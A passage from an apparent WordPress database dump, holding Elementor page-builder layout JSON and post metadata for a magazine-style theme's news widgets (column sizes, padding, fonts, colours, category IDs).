"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1135,415,'_elementor_version','0.4'),(1136,415,'_elementor_css','a:3:{s:4:\"time\";i:1508855243;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1137,416,'_edit_last','1'),(1138,416,'_edit_lock','1509464208:1'),(1141,416,'_thumbnail_id','655'),(1142,416,'_wp_page_template','default'),(1146,416,'post_views_count','1290'),(1149,419,'_elementor_edit_mode','builder'),(1150,419,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"g